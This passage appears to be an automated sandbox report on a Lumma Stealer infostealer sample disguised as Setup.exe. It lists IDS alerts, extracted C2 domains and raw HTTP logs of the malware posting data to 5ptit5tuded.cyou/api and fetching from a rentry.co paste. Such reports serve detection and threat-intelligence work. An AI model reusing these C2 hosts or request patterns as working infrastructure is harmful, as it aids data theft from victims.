                    Source: Binary string: C:\jenkins\workspace\dev\juno-win_live\build\eaSteamProxy\pc64-vc-tool-opt\bin\EASteamProxy.pdbc source: Setup.exe, 00000004.00000000.1817611630.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000004.00000002.1970234983.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000002.2040700513.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000000.1904136385.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp
                    Source: Binary string: D:\juno\p4\desktop\packages\openSSL\1.1.1s\installed\source\libssl-1_1-x64.pdb?? source: Setup.exe, 00000004.00000002.2039104912.00007FFBA9BF4000.00000002.00000001.01000000.00000010.sdmp, Setup.exe, 00000004.00000003.1903329765.0000029C04643000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2084518585.00007FFBA9BF4000.00000002.00000001.01000000.00000010.sdmp
                    Source: Binary string: c:\buildslave\steam_rel_client_win64\build\src\steam_api\win64\Release\steam_api64.pdb source: Setup.exe, 00000004.00000002.2048428381.00007FFBA9CE7000.00000002.00000001.01000000.0000000B.sdmp, Setup.exe, 00000007.00000002.2085703925.00007FFBA9CE7000.00000002.00000001.01000000.0000000B.sdmp
                    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: Setup.exe, 00000004.00000002.2055448652.00007FFBC3145000.00000002.00000001.01000000.00000012.sdmp, Setup.exe, 00000007.00000002.2086516653.00007FFBC3145000.00000002.00000001.01000000.00000012.sdmp
                    Source: Binary string: C:\Develop\dev-Milky\apps\ICQBasic\MIBResources\MIBResources\Eng\_dmt\LiteRes.pdbqsutuuuvwz~ source: powershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: Q:\build\qt\qtbase\lib\Qt5Core.pdbT source: Setup.exe, 00000004.00000002.2020848996.00007FFBA223C000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe, 00000007.00000002.2078219554.00007FFBA223C000.00000002.00000001.01000000.0000000A.sdmp

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49717 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49710 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49710 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49715 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49709 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49709 -> 188.114.97.3:443
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: processhol.sbs
                    Source: Malware configuration extractorURLs: p3ar11fter.sbs
                    Source: Malware configuration extractorURLs: peepburry828.sbs
                    Source: Malware configuration extractorURLs: p10tgrace.sbs
                    Source: Malware configuration extractorURLs: 3xp3cts1aim.sbs
                    Source: Malware configuration extractorURLs: 5ptit5tuded.cyou
                    Connects to a pastebin service (likely for C&C)
                    Source: unknownDNS query: name: rentry.co
                    Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                    Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                    Source: Joe Sandbox ViewIP Address: 172.67.75.40 172.67.75.40
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49709 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49713 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49717 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49710 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49714 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49718 -> 172.67.75.40:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49715 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49712 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49716 -> 188.114.97.3:443
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: 5ptit5tuded.cyou
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 50Host: 5ptit5tuded.cyou
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=15SYDMEWXHQKVCMUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12831Host: 5ptit5tuded.cyou
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=VOHK04ZTITUZBUUFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15066Host: 5ptit5tuded.cyou
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=INXXJSED9RCD5XITUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20233Host: 5ptit5tuded.cyou
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=UXYS3DE3NDBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1165Host: 5ptit5tuded.cyou
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=DS3RNFCGQUM26User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 207903Host: 5ptit5tuded.cyou
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 85Host: 5ptit5tuded.cyou
                    Source: global trafficHTTP traffic detected: GET /feouewe5/raw HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: rentry.co
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /feouewe5/raw HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: rentry.co
                    Source: Setup.exe, 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp, Setup.exe, 00000007.00000002.2050033866.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: 04:7e:cb:e9:fc:a5:5f:7b:d0:9e:ae:36:e1:0c:ae:1email.google.comf5:c8:6a:f3:61:62:f1:3a:64:f5:4f:6d:c9:58:7c:06www.google.comd7:55:8f:da:f5:f1:10:5b:b2:13:28:2b:70:77:29:a3login.yahoo.com39:2a:43:4f:0e:07:df:1f:8a:a3:05:de:34:e0:c2:293e:75:ce:d4:6b:69:30:21:21:88:30:ae:86:a8:2a:71e9:02:8b:95:78:e4:15:dc:1a:71:0a:2b:88:15:44:47login.skype.com92:39:d5:34:8f:40:d1:69:5a:74:54:70:e1:f2:3f:43addons.mozilla.orgb0:b7:13:3e:d0:96:f9:b5:6f:ae:91:c8:74:bd:3a:c0login.live.comd8:f3:5f:4e:b7:87:2b:2d:ab:06:92:e3:15:38:2f:b0global trustee05:e2:e6:a4:cd:09:ea:54:d6:65:b0:75:fe:22:a2:56*.google.com0c:76:da:9c:91:0c:4e:2c:9e:fe:15:d0:58:93:3c:4cDigiNotar Root CAf1:4a:13:f4:87:2b:56:dc:39:df:84:ca:7a:a1:06:49DigiNotar Services CA36:16:71:55:43:42:1b:9d:e6:cb:a3:64:41:df:24:38DigiNotar Services 1024 CA0a:82:bd:1e:14:4e:88:14:d7:5b:1a:55:27:be:bf:3eDigiNotar Root CA G2a4:b6:ce:e3:2e:d3:35:46:26:3c:b3:55:3a:a8:92:21CertiID Enterprise Certificate Authority5b:d5:60:9c:64:17:68:cf:21:0e:35:fd:fb:05:ad:41DigiNotar Qualified CA46:9c:2c:b007:27:10:0dDigiNotar Cyber CA07:27:0f:f907:27:10:0301:31:69:b0DigiNotar PKIoverheid CA Overheid en Bedrijven01:31:34:bfDigiNotar PKIoverheid CA Organisatie - G2d6:d0:29:77:f1:49:fd:1a:83:f2:b9:ea:94:8c:5c:b4DigiNotar Extended Validation CA1e:7d:7a:53:3d:45:30:41:96:40:0f:71:48:1f:45:04DigiNotar Public CA 202546:9c:2c:af46:9c:3c:c907:27:14:a9Digisign Server ID (Enrich)4c:0e:63:6aDigisign Server ID - (Enrich)72:03:21:05:c5:0c:08:57:3d:8e:a5:30:4e:fe:e8:b0UTN-USERFirst-Hardware41MD5 Collisions Inc. (http://www.phreedom.org/md5)08:27*.EGO.GOV.TR08:64e-islem.kktcmerkezbankasi.org03:1d:a7AC DG Tr equals www.yahoo.com (Yahoo)
                    Source: global trafficDNS traffic detected: DNS query: 5ptit5tuded.cyou
                    Source: global trafficDNS traffic detected: DNS query: rentry.co
                    Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: 5ptit5tuded.cyou
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 19 Nov 2024 19:06:41 GMTContent-Type: text/html; charset=UTF-8Content-Length: 8771Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
                    Source: Setup.exe, 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp, Setup.exe, 00000007.00000002.2050033866.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://bugreports.qt.io/
                    Source: Setup.exe, 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp, Setup.exe, 00000007.00000002.2050033866.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://bugreports.qt.io/_q_receiveReplyensureClientPrefaceSentMicrosoft-IIS/4.Microsoft-IIS/5.Netsca
                    Source: Setup.exe, 00000007.00000002.2013467032.000002563FFF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://c0rl.m%L
                    Source: Setup.exe, 00000004.00000002.1939655810.0000029C06AD9000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2013616968.0000025640252000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000008.00000002.2013261383.0000000004C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
                    Source: Setup.exe, 00000004.00000002.1939655810.0000029C06AD9000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2013616968.0000025640252000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000008.00000002.2013261383.0000000004C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198B91F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BACF6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000004.00000002.1939655810.0000029C06AD9000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2013616968.0000025640252000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000008.00000002.2013261383.0000000004C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BACA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BAC7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BABC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BACF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BAE9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198B9E84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                    Source: msiexec.exe, 0000000A.00000003.2120077314.0000000005550000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                    Source: msiexec.exe, 0000000A.00000003.2120077314.0000000005550000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198B91F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BACF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                    Source: Setup.exe, 00000004.00000002.1939655810.0000029C06AD9000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2013616968.0000025640252000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000008.00000002.2013261383.0000000004C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BABC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BACF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198B9E84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BACA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BAC7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BABC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BACF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BAE9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198B9E84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BACA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BAC7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BABC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BACF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BAE9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198B9E84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cf.icq.com/cf/2002/icqswatch.html
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cf.icq.com/cf/icqlite/download_p.html4Please
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cf.icq.com/cf/icqlite/firewall_help.html/http://cf.icq.com/cf/icqlite/fail_register.html/http
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cf.icq.com/cf/icqlite/help.html8Failed
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cf.icq.com/cf/icqlite/legal.html
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cf.icq.com/cf/icqlite/liteskin.html
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cf.icq.com/cf/icqlite/lost_password.html
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cf.icq.com/cf/icqlite/public_private_modes.html
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cf.icq.com/cf/icqlite/spam_auto_filter.html2http://cf.icq.com/cf/icqlite/spam_auto_filter.htm
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cf.icq.com/cf/icqlite/zodiac.html
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BACA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BAC7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BABC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BAC30000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BAE9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198B9FFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198B9FFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BB26F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BB447000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gs/gscodesigng2.crl0
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BB26F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BB447000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingg2.crl0T
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BB26F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BB447000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BB26F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BB447000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BB26F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BB447000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root.crl0
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BB26F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BB447000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root.crl0O
                    Source: Setup.exe, 00000004.00000002.1937699417.0000029C06880000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2013467032.000002563FFF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                    Source: msiexec.exe, 0000000A.00000003.2179484797.0000000000752000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                    Source: msiexec.exe, 0000000A.00000003.2120077314.0000000005550000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BACA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BAC7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BABC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BAC30000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BAE9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198B91F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198B9FFA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BACF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                    Source: Setup.exe, 00000004.00000002.1937699417.0000029C06880000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2013467032.000002563FFF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.d
                    Source: Setup.exe, 00000004.00000002.1939655810.0000029C06AD9000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2013616968.0000025640252000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000008.00000002.2013261383.0000000004C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BACA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BAC7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BABC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BACF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BAE9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198B9E84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                    Source: Setup.exe, 00000004.00000002.1939655810.0000029C06AD9000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2013616968.0000025640252000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000008.00000002.2013261383.0000000004C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198B91F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BACF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                    Source: Setup.exe, 00000004.00000002.1939655810.0000029C06AD9000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2013616968.0000025640252000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000008.00000002.2013261383.0000000004C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                    Source: msiexec.exe, 0000000A.00000003.2120077314.0000000005550000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                    Source: msiexec.exe, 0000000A.00000003.2120077314.0000000005550000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
